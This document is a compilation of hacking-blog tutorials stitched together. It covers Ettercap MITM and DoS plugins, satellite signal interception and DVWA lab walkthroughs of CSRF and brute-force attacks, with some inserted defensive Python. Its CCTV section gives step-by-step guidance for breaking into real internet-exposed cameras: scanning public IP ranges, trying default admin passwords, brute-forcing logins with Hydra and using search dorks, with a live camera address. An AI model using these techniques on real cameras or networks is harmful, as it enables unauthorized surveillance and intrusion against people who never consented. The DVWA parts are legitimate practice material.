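    ArpReply(1.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # gateway, consistent
    ArpReply(2.0, "192.168.1.1",  "aa:bb:cc:00:00:20"),   # laptop claims gateway IP
    ArpReply(3.0, "192.168.1.30", "aa:bb:cc:00:00:31"),   # new host
    ArpReply(4.0, "192.168.1.30", "aa:bb:cc:00:00:32"),   # NIC swapped or DHCP churn
    ArpReply(5.0, "192.168.1.40", "aa:bb:cc:00:00:32"),   # same MAC, second IP
]


def run_sample() -> List[Alert]:
    w = ArpWatch(GATEWAY)
    for r in SAMPLE_REPLIES:
        w.observe(r)
    return w.alerts


if __name__ == "__main__":
    for a in run_sample():
        print(f"t={a.ts:4.1f} {a.kind:13} {a.ip} {a.old_mac} -> {a.new_mac}")
```

Seeding matters: without the gateway entry, the first spoofed reply would be learned as the gateway's true address, which is the inaccuracy the plugin's host-list advice refers to. On a real monitor, entries for fixed infrastructure should never be overwritten by a later reply; the table here tracks the latest binding only to keep the example short.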

2. autoadd

It will automatically add new victims to the ARP poisoning MITM attack when they come up.

It looks for ARP requests on the LAN and, when one is detected, it will add the host to the victims list if it was specified in the TARGET.

3. chk_poison

It performs a check to see if the ARP poisoning module of ettercap was successful.

It sends spoofed ICMP echo packets to all the victims of the poisoning pretending to be each of the other targets.

If we can catch an ICMP reply with our MAC address as a destination it means that the poisoning between those two targets is successful.

It checks both ways of each communication.

4. dns_spoof

This plugin intercepts DNS queries and replies with a spoofed answer.

You can choose to which address the plugin has to reply by modifying the etter.dns file.

5. dos_attack

This plugin runs a DOS attack against a victim IP address.

It first “scans” the victim to find open ports, then starts to flood these ports with SYN packets, using a “phantom” address as source IP.

Then it uses fake ARP replies to intercept packets for the phantom host.

When it receives SYN-ACK from the victim, it replies with an ACK packet creating an ESTABLISHED connection.

You have to use a free IP address in your subnet.

6. dummy

Only a template to demonstrate how to write a plugin.

7. find_conn

A simple plugin that listens for ARP requests to show you all the targets a host wants to talk to. It can also help you find addresses in an unknown LAN.

8. find_ettercap

Tries to identify ettercap packets sent on the LAN. It could be useful to detect whether someone is using ettercap.

9. find_ip

Find the first unused IP address in the range specified by the user in the target list.

Some other plugins (such as gre_relay) need an unused IP address of the LAN to create a “fake” host.

It can also be useful to obtain an IP address in an unknown LAN where there is no DHCP server.

10. finger

Uses the passive fingerprint capabilities to fingerprint a remote host.

It does a connect() to the remote host to force the kernel to reply to the SYN with a SYN+ACK packet.

The reply will be collected and the fingerprint is displayed.

11. finger_submit

Use this plugin to submit a fingerprint to the ettercap website.

If you found an unknown fingerprint, but you know for sure the operating system of the target, you can submit it so it will be inserted in the database in the next ettercap release.

12. isolate

The isolate plugin will isolate a host from the LAN.

It will poison the victim's ARP cache with its own MAC address associated with all the hosts it tries to contact.

This way the host will not be able to contact other hosts because the packet will never reach the wire.

13. rand_flood

Floods the LAN with random MAC addresses.

14. repoison_arp

It solicits poisoning packets after broadcast ARP requests (or replies) from a poisoned host.

For example, we are poisoning Group1 impersonating Host2.

If Host2 makes a broadcast ARP request for Host3, it is possible that Group1 caches the right MAC address for Host2 contained in the ARP packet.

This plugin re-poisons Group1 cache immediately after a legal broadcast ARP request (or reply).

This is all about Ettercap-gtk, an MITM attack tool.

Hope to see you guys in the next article, till then Keep Hacking.

How To Hack Satellites ? Is That Even Possible?!


In this article you will learn about how to hack a satellite.

We all know about hacking Windows/Linux, CCTV cameras, etc., but many people doubt whether a satellite can be hacked.

This is what we are going to find out in this article, so let's jump into it.

Satellite

A satellite is a moon, planet or machine that orbits a planet or star.

For example, Earth is a satellite because it orbits the sun.

Likewise, the moon is a satellite because it orbits Earth.

Usually, the word “satellite” refers to a machine that is launched into space and moves around Earth or another body in space.

Earth and the moon are examples of natural satellites.

Thousands of artificial, or man-made, satellites orbit Earth.

Some take pictures of the planet that help meteorologists predict weather and track hurricanes.

Some take pictures of other planets, the sun, black holes, dark matter or faraway galaxies.

These pictures help scientists better understand the solar system and universe.

Still other satellites are used mainly for communications, such as beaming TV signals and phone calls around the world.

A group of more than 20 satellites makes up the Global Positioning System, or GPS.

If you have a GPS receiver, these satellites can help figure out your exact location.

Is it possible to hack Satellite communication?

Well, different sources give different answers to this question: some say it is simple to hack a satellite, while others have shown that hacking a satellite is not an easy process because of its high security; satellite interception, however, is certainly done.

Satellite hacking can be broken down into four main types: jamming, eavesdropping, hijacking, and control.

JAMMING – flooding or consuming a signal, transmitter, or receiver, so that the valid transmission cannot reach its destination.

EAVESDROPPING – allows a hacker to see and hear what is being transmitted.

HIJACKING – the illegal use of a satellite for transmission, or seizing a signal being broadcast and replacing it with another. Files sent via satellite Internet can be copied and altered in transit.

CONTROLLING – taking control of the ground stations, bus, and/or payload; in particular, being able to trick a satellite in orbit.

Step-by-step process to intercept satellite signals

We use satellite communication in many ways and in many industries, and we all know how important it is in our lives.

There are different kinds of satellites, classified by their distance from the Earth and by their orbits. Circular and elliptical orbits are the two kinds of orbit.

Here is the step-by-step process of hacking a satellite by Mike Stevens, professor of satellite ethical hacking training at the International Institute of Cyber Security.

STEP 1

You will need a satellite dish with a Low Noise Block downconverter (LNB). The bigger the dish, the better the range of signals it can pick up. The cost of a good satellite dish can vary from 50 USD to 300 USD, and they are very easily available.

The size of the antenna depends upon the satellite you wish to sniff; if you only want to sniff one particular satellite, a small 75 cm dish will do. You can easily find this out by searching the Internet or by visiting the satellite company's website.

You can get details about the satellite you want to intercept from the Internet.

STEP 2

The next thing you need is a DVB tuner card (DVB-S/S2 tuner card). A DVB tuner card allows satellite signals to be received by a computer. Most DVB tuners also function as video and multimedia capture cards, allowing them to record satellite content onto a hard disk. The cards come as PCI Express (PCIe), PCMCIA, ExpressCard, or USB devices. The tuner card is easily available on the market and costs around 100 USD. A few cards that work smoothly are DVBWorld, TBS/QBOX, Azureware, TechniSat, TechnoTrend, Genitech, and TeVii. These cards can be installed as normal PCI cards or in USB form, and their installation is very easy.

STEP 3

Now you need feed scanner software, so that you can do automatic scanning, and a stream reader .dll; this is basically the protocol driver that turns streams into readable data such as binary and ASCII files (videos, documents, pages, torrents). There are many free programs available online. Some of the scanning programs are Crazy Scan and Easy Blind Scan. With this software you can do auto scanning.

STEP 4

After that you will need software depending on what your end goal is. This software allows offline downloading of data, live streaming of radio and video, satellite Internet and intercepting signals. Some of these programs are: Skynet, Fishnet, DVBDream, ProgDVB, AltDVB, and TSReader.

For background, this is how the link works: an uplink earth station transmits the desired signal to the satellite. The satellite receives and processes the incoming signal by changing its frequency and amplifying it. The satellite then transmits the signal back to earth, typically covering a large geographical area.

This content is for education purposes only.

I hope this Article Helps You.

Happy Hacking!!!!

How To Hack A CCTV Camera?


A researcher from the cloud-based video surveillance company Cloudview suggested that the majority of CCTV (Closed Circuit Television) systems can be hacked, providing an open door to cyber attackers.

Amazingly, you can not only hack but also control almost every type of CCTV camera.

Today we will learn about hacking private CCTV and Google hacking, step by step.

PRIVATE CCTV HACKING

Step 1: Download Angry IP Scanner

Angry IP Scanner is a powerful GUI port scanner. It is available for all major operating systems.

Step 2: Choose an IP Address Range

It is important to choose a proper IP address range for CCTV camera hacking.

CCTV cameras are connected via broadband Internet connections.

If you access the Internet through a broadband router, find your public IP address.

Type 'My IP' in Google. Google will show your public IP address.

The IP range can be 77.247.181.1 to 77.247.181.255 or 77.247.181.1 to 77.247.185.255


Step 3: Configure Angry IP Scanner for CCTV Camera Hacking

Open Angry IP Scanner.

Go to Tools > Preferences > Ports and add ports 80, 8080, 23 in the port selection tab.

You can also add the Web detect fetcher.

This will help you detect devices and show short details about the devices connected to the Internet.

For example:

CCTV camera model name

CCTV camera name

Router name or router model name

The way to add Web detect is as follows:

Go to Tools > Fetchers > add (<<) Web detect

Click OK

Step 4: Start IP Range Scanning

Add the IP range in the IP range tab and click Start.

After scanning you will find information in the Web detect column; some examples are as follows:

DVRDVS-Webs —– CCTV camera

Webs —– CCTV camera

Hikvision-Webs —– CCTV camera

iBall-Baton —– CCTV camera

Copy the IP address of the detected CCTV camera, paste it in the browser and press Enter.


Step 5: Default Username and Password

Most CCTV cameras and routers are configured with a default username and password, like:

Username: admin | Password: admin / (blank password) / 12378 / 11111

You can also find default username and password lists by searching on Google.

Some CCTV cameras require a plugin; you can download it from the same page.

If the plugin is not found on the same page, go to the manufacturer's website and download it.

Step 6: Crack the CCTV Camera Password Using Hydra

If the default password does not work, then we need to crack it.

Hydra is a powerful brute force tool and can crack CCTV camera passwords.

Hydra syntax

-s 80 – define the port number

-l admin – the login name (lowercase -l takes a single name such as admin; uppercase -L expects a file of names)

-P /root/desktop/worldlist.txt – choose your word list for the brute force

-e ns – also try an empty password (n) and the login name as the password (s)

http – the service module to attack

Using these options you can hack CCTV cameras.

WAY TO HACK CCTV BY GOOGLE HACKING

Step 1: Go to Google: http://www.google.com

Step 2: Enter any one of the following lines:

* inurl:view/index.shtml

* inurl:view/view.shtml

* live applet

* intitle:"live view" intitle:axis

* intitle:live applet

* allintitle:"Network Camera"

* intitle:axis intitle:"video serve"

Step 3: Find a website similar to this: http://67.53.48.2/CgiStart?page=Single&Language=0

Step 4: Open a link from that... and the hacking is done.

Wanna see a Japan live traffic camera? Click Here

NOTE: CCTVs are found in almost every possible place for safety and security purposes, to discourage criminals and prevent crime, so the tutorial given above is just for knowledge, not for criminal purposes.

Let me know what you feel about this article, and how you used this for hacking. Does it really help?

Pass your comments.

Check out our article on Nessus here.

Happy Hacking!!

How To Practice Hacking With DVWA ?! : Step-By-Step Guide

Hello viewers. Hackers and security professionals need to practice and test their skills in a legal environment, which also helps web developers better understand the procedures for securing web applications and helps people learn web application security. So how can we do that? The solution is DVWA, which is a deliberately vulnerable web application.

Here in this article I came up with hacking with DVWA, which is quite useful for hackers today.

Damn Vulnerable Web App (DVWA)

Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to help teachers/students teach/learn web application security in a classroom environment.

The aim of DVWA is to practice some of the most common web vulnerabilities, with various difficulty levels, through a simple, straightforward interface. Please note that there are both documented and undocumented vulnerabilities in this software.

Damn Vulnerable Web App is available either as a package that will run on your own web server or as a Live CD:

  • DVWA v1.9 Source (Stable) – [1.3 MB] Download ZIP – Released 2015-10-05
  • Version 1.0.7 LiveCD – [480 MB] Download ISO – Released 2010-09-08
  • Development Source (Latest) Download ZIP

DVWA can be installed either on Windows or on Kali Linux.

  • Find the full installation guide for DVWA on Windows here.
  • Find the full installation guide for DVWA on Kali Linux here.

Up to now we have learned what DVWA is and how to install it.

Now we will see how to practice with DVWA.

Right off the bat, we will do:

DVWA Cross Site Request Forgery

This will show you how to exploit a CSRF vulnerability on DVWA (Damn Vulnerable Web Application).

CSRF stands for Cross Site Request Forgery.

What CSRF really means is that we ride a user's session and force them to take unwanted actions on a web application, provided they are currently authenticated with the application.

This is a very simple attack. Let's jump right in and take a look.

First step, let's do a little recon on the password change form. Submit a password change and inspect the HTTP request.

  • It's a GET request, and we can see the parameters sent along with the request.

  • So here is the attack scenario. A hacker with malicious intent sends the victim to my site. Here is what my site looks like:

  • Looks harmless enough. As far as the victim is concerned, it's just text. But let's look under the hood.

  • Instead of the src attribute pointing to an image resource, we're pointing it at the password change endpoint and changing the password to "pwned".

  • So when the victim visits our attacker's site they are unaware that anything has happened. But if we look at the network requests:

  • Our img tag made the browser send a GET request to the change password endpoint.

  • And because the GET request originated from the victim's browser, and the victim was already authenticated, it sent the PHPSESSID in an HTTP cookie.

  • So as far as the web application is concerned, the request came from an authenticated user.

  • Now you will be able to log in with the new password "pwned".
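As an added illustration (not code from the article or from DVWA itself), here is a small Python model of the two behaviours described above: a DVWA-style low-security handler that accepts the password change over a GET carrying only the session cookie, next to a hardened handler that demands a POST and a per-session anti-CSRF token the attacker's page cannot read. The endpoint path, the parameter names password_new / password_conf / user_token, and the session and password values are assumptions for the demo.

```python
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlparse

SESSIONS = {"ahs8eugnukjkh9auegathrbfg5": "admin"}  # constructed; PHPSESSID as shown on the page
PASSWORDS = {"admin": "password"}
CSRF_TOKENS = {}  # session id -> per-session anti-CSRF token

@dataclass
class Request:
    method: str
    url: str
    cookies: dict
    body: dict = field(default_factory=dict)

def _apply_change(user, new, conf):
    if new and new == conf:
        PASSWORDS[user] = new
        return "Password Changed."
    return "Passwords did not match."

def vulnerable_change_password(req):
    """DVWA-style 'low' handler: a GET carrying a valid session cookie is enough."""
    user = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if user is None:
        return "not logged in"
    qs = parse_qs(urlparse(req.url).query)
    return _apply_change(user, qs.get("password_new", [""])[0], qs.get("password_conf", [""])[0])

def issue_token(session_id):
    """Called when the real form is rendered; the token is embedded in a hidden field."""
    CSRF_TOKENS[session_id] = secrets.token_hex(16)
    return CSRF_TOKENS[session_id]

def hardened_change_password(req):
    """Requires POST plus a session-bound token; a forged <img> GET can supply neither."""
    sid = req.cookies.get("PHPSESSID")
    user = SESSIONS.get(sid)
    if user is None:
        return "not logged in"
    if req.method != "POST":
        return "method not allowed"
    expected = CSRF_TOKENS.get(sid)
    if not expected or not secrets.compare_digest(req.body.get("user_token", ""), expected):
        return "CSRF token is incorrect"
    return _apply_change(user, req.body.get("password_new", ""), req.body.get("password_conf", ""))

def forged_img_request():
    """The GET the victim's browser sends for the attacker's <img src=...> (constructed URL)."""
    return Request("GET", "http://dvwa.local/vulnerabilities/csrf/?password_new=pwned"
                   "&password_conf=pwned&Change=Change", {"PHPSESSID": "ahs8eugnukjkh9auegathrbfg5"})
```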

DVWA Brute Force

With this demo you can complete a brute force attack on DVWA (Damn Vulnerable Web Application).

To complete this attack we need the following:

  • Kali Linux
  • DVWA v1.9 running on a different machine

First off, we should understand what is going on when the user submits a form.

For example, is it a GET or POST request? Where is the request going to? What data is being sent?

Kali comes with a powerful tool called Burp Suite.

Burp Suite is a huge tool and does a ton of different things.

For this attack we'll just be focusing on how we can use it for our brute force attack.

Burp Suite will act as a proxy server.

HTTP request through a proxy:

Our browser -> Proxy server -> Target server

  • With Burp Suite sitting in the middle, we can intercept the request from our browser before it reaches the target server.

  • There are various reasons why we would want to. For the purposes of this attack we are doing it so we can inspect the HTTP request.

Setting up the proxy server

  • To set up the proxy server, open Burp Suite and click Proxy in the top row of tabs, then select Options.

  • You'll see the proxy server address.

  • Kali's default installed browser is Iceweasel.

  • Open it and we'll point it at our Burp Suite proxy server.

  • In the URL bar type

  • It will lead you to the settings page.

  • On the left select Advanced, and from the tabs on the right select Network. Click Settings and enter the proxy server address.

With our proxy configured, we're ready. Head over to the target page and enable the Burp Suite interceptor.

Inspect the login request

  • With the interceptor enabled, any requests made from our browser will be stopped by the proxy server.

    Then we can inspect, modify, drop or forward the request.

    Without entering any credentials, hit the login button and let's inspect the request.

  • You should see this:

There is some key info here:

  • It's a GET request

  • The login parameters (username=&password=&Login=Login)

  • The cookie (security=low; PHPSESSID=ahs8eugnukjkh9auegathrbfg5)

With this information, we can reproduce the request and use it in our brute force attack.

Next, We Attack

Generally for brute force the main weapon of choice is THC Hydra.

Hydra can perform rapid dictionary attacks against an authentication service.

Here's the data we're going to give Hydra for our attack:

  • target server
  • URL path
  • username
  • password dictionary
  • cookie
  • failure message

For the username, assume we know the username is admin.

You can also give Hydra a username dictionary, but we'll just focus on the password.

The failure message is the response we get from the login form when we submit a bad login.

It's just a string that Hydra scans the response HTML for to check whether the login succeeded or failed.

For example, the message we get in red under the login form after a bad login attempt is

"Username and/or password incorrect."

  • The whole command will look like this:

  • In action, we see a successful attack:
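From the defender's side, the request shape above (a GET to the login form with username and password in the query string, answered with HTTP 200 whether or not the login worked) is also what makes a Hydra run visible in the web server's access log. The following Python is an added example, not part of the article or of DVWA, that flags any source submitting ten or more logins for one username within a minute; the log format, the form path /vulnerabilities/brute/ and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Apache combined-log-format line (assumed log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/vulnerabilities/brute/"  # assumed path of the DVWA login form under test

def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlparse(m["path"]).query)
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "path": urlparse(m["path"]).path, "user": qs.get("username", [""])[0]}

def detect_bruteforce(lines, window_s=60, threshold=10):
    """Flag (ip, username) pairs that submit >= threshold logins inside any window_s seconds.
    DVWA answers every attempt with HTTP 200 (which is why Hydra needs the failure string),
    so the status code is useless here and we count attempts instead."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["path"] != LOGIN_PATH or not ev["user"]:
            continue
        key = (ev["ip"], ev["user"])
        q = recent[key]
        q.append(ev["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:  # drop attempts outside the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

# Constructed sample log: one source hammering 'admin' twelve times in twelve seconds,
# plus a normal user who mistypes once and retries a couple of minutes later.
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2024:10:00:{i:02d} +0000] "GET {LOGIN_PATH}?username=admin'
    f'&password=w{i}&Login=Login HTTP/1.1" 200 1325' for i in range(12)
] + [
    f'10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "GET {LOGIN_PATH}?username=alice&password=x&Login=Login HTTP/1.1" 200 1325',
    f'10.0.0.9 - - [01/Jan/2024:10:07:30 +0000] "GET {LOGIN_PATH}?username=alice&password=y&Login=Login HTTP/1.1" 200 1325',
]

if __name__ == "__main__":
    for (ip, user), n in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force: {ip} -> {user}, {n} attempts within 60s")
```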

I hope you liked reading the article.

If you find this article worthy, feel free to share this article to your friends and followers.

And if you have any doubts, put in the comment section below, I would like to answer it.

Thank you for reading the Article.

Check out this Eminent article about bWAPP here

Happy Hacking.